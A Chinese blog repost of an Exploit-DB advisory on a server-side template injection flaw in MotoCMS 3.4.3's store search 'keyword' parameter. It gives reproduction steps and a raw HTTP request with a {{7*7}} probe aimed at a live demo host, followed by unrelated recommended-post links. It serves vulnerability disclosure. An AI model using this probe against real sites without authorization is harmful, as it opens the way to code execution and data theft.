MotoCMS版本3.4.3 - 服务端模板注入漏洞(SSTI)

最新推荐文章于 2024-07-10 17:18:35 发布
最新推荐文章于 2024-07-10 17:18:35 发布
阅读量176 收藏
点赞数
文章标签: 安全
原文链接:https://www.exploit-db.com/exploits/51499
版权

MotoCMS 3.4.3 Store Category Template存在Server-Side Template Injection (SSTI)漏洞,攻击者可以利用keyword参数进行攻击。

漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。

具体攻击步骤为:1.打开目标URL: https://template189526.motopreview.com/;
2.在此处编写payload:https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}};
3.将会看到结果为49。

GET /store/category/search/?page=&limit=&keyword={{7*7}} HTTP/1.1
Host: template189526.motopreview.com
Cookie: PHPSESSID=7c0qgdvsehaf1a2do6s0bcl4p0; 9b7029e0bd3be0d41ebefd47d9f5ae46_session-started=1685536759239
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Referer: https://template189526.motopreview.com/store/category/search/?keyword=%7B%7B3*3%7D%7D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
dhu码农
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
spark-3.4.3-bin-hadoop3.tgz
04-22
Apache Spark 是专为大规模数据处理而设计的快速通用的计算引擎。Spark是UC Berkeley AMP lab (加州大学伯克利分校的AMP实验室)所开源的类Hadoop MapReduce的通用并行框架,Spark,拥有Hadoop MapReduce所具有的优点...
yum-3.4.3-168.el7.centos.noarch.rpm
12-24
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
Flash网页设计师的福音Moto CMS《介绍》
沙漠之泉
10-09 1300
想必大家对于华丽的flash网站多很羡慕,本人就一直想把网站做成想Flash那样,纹理清晰,图片显示高清;但现有的基于HTML的网站来说,还没有哪个网站设计效果能与flash网站的相比;虽然下一代web技术在这方面也做了很大努力,但效果也很难做到FLASH那样。 Flash
JeecgBoot 3.4.3-GA 版本发布,开源免费的企业级低代码平台
JEECG官方博客
10-28 9428
又升级了,重要的事情说三遍 ! 升级Online前端依赖,解决了几个很棒的功能 !!!
安装yum: rpm >= 0:4.11.3-22 被 yum-3.4.3-154.el7.centos.noarch
weixin_30420305的博客
07-05 3821
安装yum: 最近在centos7上安装了python3导致yum不能用,被其他人卸载掉后重新安装 #下载yum安装包 wget http://mirrors.163.com/centos/6/os/x86_64/Packages/yum-3.2.27-14.el6.centos.noarch.rpm wget http://mirrors.163.com/centos/7/os/x86_64/P...
Joomla 3.4.3版本 SQL注入漏洞分析
Fly_鹏程万里
03-31 3428
0x00 漏洞分析 漏洞触发的代码位于:/administrator/components/com_contenthistory/models/history.php,getListQuery()函数内: 通过SQL及报错信息,可以知道我们的注入payload被插入到了红色框部分内。跟进getState()函数,位于libraries/legacy/model/legacy.php文件内,...
JeecgBoot 3.4.3-Vue2 版本发布,Vue2版前端UI专项升级
JEECG官方博客
11-08 1286
JeecgBoot vue2版前端UI代码更新到3.4.3最新版,兼容最新版的后台(3.4.3、3.4.3-GA)
centos7.2安装 Redmine 3.4.3-2 (64-bit) Bitnami Redmine Installer
xin_y的专栏
01-04 2299
1.下载 地址:https://bitnami.com/redirect/to/170722/bitnami-redmine-3.4.3-2-linux-x64-installer.run 2.安装 修改bitnami-redmine-3.4.3-2-linux-x64-installer.run 权限为可执行 执行bitnami-redmine-3.4.3-2-linux-x64-ins
Mybatis-Plus 升级到3.4.3版本后 分页失效
你若为我繁华,我愿成你烟花
12-08 2144
最近把Mybatis-Plus升级到了3.4.3版本,发现分页失效了。
linux下安装yum命令
m0_67403272的博客
04-05 2788
解决: -bash: yum: command not found错误 最近在学习Linux,今天不小心在CentOS7系统下把yum命令给删除了,于是百度了好几篇文章,实话照他们的操作去做,实在不敢说啥,只得自己手动了… 步骤如下 第一步: http://mirrors.163.com/centos/7/os/x86_64/Packages/ 到上面这个网站去下载如下RPM包 python-iniparse-0.4-9.el7.noarch.rpm yum-metadata-parser-1.1.4-10
linux无法yum安装
qq_43088431的博客
08-17 2675
一、问题 RedHat在yum安装时无法进行yum install: 二、解决方式 1)查看RedHat系统本身所安装的哪些yum软件包 指令:rpm -qa | grep yum 2)卸载那些软件包 rpm -e yum-rhn-plugin-2.0.1-10.el7.noarch --nodeps rpm -e yum-metadata-parser-1.1.4-10.el7.x86_64 --nodeps rpm -e yum-3.4.3-158.el7.noarch --nodeps 3)下载
GDAL-3.4.3-cp38-cp38-win_amd64.zip
11-16
在本压缩包“GDAL-3.4.3-cp38-cp38-win_amd64.zip”中,GDAL被打包为适用于Python 3.8的二进制 wheels 文件(`GDAL-3.4.3-cp38-cp38-win_amd64.whl`)。Wheels文件是一种预编译的Python软件包格式,相比源代码安装,...
GDAL-3.4.3-cp311-cp311-win_amd64.zip
11-16
在给定的文件"GDAL-3.4.3-cp311-cp311-win_amd64.zip"中,"cp311"表示这是为Python 3.11编译的版本。这意味着该GDAL库是专门为Python 3.11设计的,确保与该特定Python版本的兼容性。在安装时,务必确认你的系统上...
matplotlib-3.4.3-cp38-cp38-win_amd64.whl
12-29
该资源为matplotlib-3.4.3-cp38-cp38-win_amd64.whl,欢迎下载使用哦!
移动互联安全扩展要求测评项
hakksjss的博客
07-10 1113
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
中小学校园EasyCVR视频综合监管方案:构建安全、智能的校园环境
最新发布
TSINGSEE青犀视频官方技术博客
07-10 1146
针对校园食堂后厨、仓库、配菜、清洗等监控区域的环境卫生与安全等进行全面的监管,及时发现违规异常情况,并能向监管人员及时发送告警信息,保障在校师生的食品与饮食安全
[图解]SysML和EA建模住宅安全系统-14-黑盒系统规约
rolt的专栏
07-10 808
系统的外部可观察行为和物理特征
Foxit Reader:高效、安全、多功能的PDF阅读器技术解析
运维人生
07-10 513
由福建福昕软件开发股份有限公司开发,是一款轻量级、高效且功能丰富的PDF阅读器。它不仅拥有比同类产品更小的安装包体积和更快的打开速度,还全面支持最新的PDF文档属性,并提供了丰富的插件和自定义选项,极大地提升了用户体验。
python3-3.4.3-6.el7.rpm
12-13
python3-3.4.3-6.el7.rpm是针对Red Hat Enterprise Linux 7操作系统的Python 3.4.3版本的软件包。Python是一种高级编程语言,广泛用于Web开发、数据分析、人工智能等领域。该软件包提供了在Red Hat Enterprise Linux...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值